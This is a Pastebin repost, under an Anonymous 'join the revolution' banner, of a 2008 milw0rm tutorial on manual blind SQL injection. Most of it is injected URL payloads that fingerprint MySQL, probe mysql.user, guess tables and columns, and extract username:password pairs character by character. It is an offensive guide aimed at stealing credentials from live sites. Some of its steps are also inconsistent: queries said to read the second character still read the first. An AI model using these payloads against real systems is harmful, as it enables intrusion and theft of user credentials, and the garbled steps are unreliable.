Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- |################################################################
- |
- | __ __ ______ __ ____
- | _\ \\ \__ /\ _ \ /\ \__ __/\ _`\
- |/\__ _ _\\ \ \L\ \ ___\ \ ,_\/\_\ \,\L\_\ __ ___
- |\/_L\ \\ \L_\ \ __ \ /' _ `\ \ \/\/\ \/_\__ \ /'__`\ /'___\
- | /\_ _ _\\ \ \/\ \/\ \/\ \ \ \_\ \ \/\ \L\ \/\ __//\ \__/
- | \/_/\_\\_\/ \ \_\ \_\ \_\ \_\ \__\\ \_\ `\____\ \____\ \____\
- | \/_//_/ \/_/\/_/\/_/\/_/\/__/ \/_/\/_____/\/____/\/____/
- |
- |################################################################
- |
- | Become Anonymous, Join the revolution
- | Re-Formated, Upped by @Ms_Pony (mspony@hush.com)
- |
- |################################################################
- Please note this is not my tut and was written by marezzi and posted on milw0rm in April 08
- it is for those that already understand basic SQL. I have not edited it, only simply
- reformatted it a little bit to make it easier to read.
- Blind SQL Injection
- Blind injection is a little more complicated the classic injection but it can be done :D
- I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad
- to read it :D
- Let's start with advanced stuff.
- I will be using our example
- ###################################################################
- http://www.site.com/news.php?id=5
- ###################################################################
- when we execute this, we see some page and articles on that page, pictures etc...
- then when we want to test it for blind sql injection attack:
- ###################################################################
- http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
- ###################################################################
- and the page loads normally, that's ok.
- now the real test:
- ###################################################################
- http://www.site.com/news.php?id=5 and 1=2 <--- this is false
- ###################################################################
- so if some text, picture or some content is missing on returned page then that site is
- vulrnable to blind sql injection.
- 1) Get the MySQL version
- to get the version in blind attack we use substring
- i.e:
- ###################################################################
- http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
- ###################################################################
- this should return TRUE if the version of MySQL is 4.
- replace 4 with 5, and if query return TRUE then the version is 5.
- i.e:
- ###################################################################
- http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
- ###################################################################
- 2) Test if subselect works
- when select don't work then we use subselect
- i.e:
- ###################################################################
- http://www.site.com/news.php?id=5 and (select 1)=1
- ###################################################################
- if page loads normally then subselects work.
- then we gonna see if we have access to mysql.user
- i.e:
- ###################################################################
- http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
- ###################################################################
- if page loads normally we have access to mysql.user and then later we can pull some
- password usign load_file() function and OUTFILE.
- 3). Check table and column names
- This is part when guessing is the best friend :)
- i.e:
- ###################################################################
- http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
- ###################################################################
- with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,
- this is very important.
- then if the page loads normally without content missing, the table users exits.
- if you get FALSE (some article missing), just change table name until you guess the right
- one :)
- let's say that we have found that table name is users, now what we need is column name.
- the same as table name, we start guessing. Like i said before try the common names for
- columns.
- i.e:
- ###################################################################
- http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users
- limit 0,1)=1
- ###################################################################
- if the page loads normally we know that column name is password (if we get false then try
- common names or just guess)
- here we merge 1 with the column password, then substring returns the first character (,1,1)
- 4). Pull data from database
- we found table users i columns username password so we gonna pull characters from that.
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>80
- ###################################################################
- ok this here pulls the first character from first user in table users.
- substring here returns first character and 1 character in length. ascii() converts that 1
- character into ascii value
- and then compare it with simbol greater then > .
- so if the ascii char greater then 80, the page loads normally. (TRUE)
- we keep trying until we get false.
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>95
- ###################################################################
- we get TRUE, keep incrementing
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>98
- ###################################################################
- TRUE again, higher
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>99
- ###################################################################
- FALSE!!!
- ###################################################################
- so the first character in username is char(99). Using the ascii converter we know that
- char(99) is letter 'c'.
- ###################################################################
- then let's check the second character.
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),2,1))>99
- ###################################################################
- Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second
- character, 1 character in lenght)
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>99
- ###################################################################
- TRUE, the page loads normally, higher.
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>107
- ###################################################################
- FALSE, lower number.
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>104
- ###################################################################
- TRUE, higher.
- ###################################################################
- http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat
- (username,0x3a,password) from users limit 0,1),1,1))>105
- ###################################################################
- FALSE!!!
- we know that the second character is char(105) and that is 'i'. We have 'ci' so far
- so keep incrementing until you get the end. (when >0 returns false we know that we have
- reach the end).
- There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing
- everything manually, cause that makes you better SQL INJECTOR :D
- Hope you learned something from this paper.
- Have FUN! (:
- To be continued and updated...
- marezzi@gmail.com
- [18 April 2008]
- # milw0rm.com [2008-05-22]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement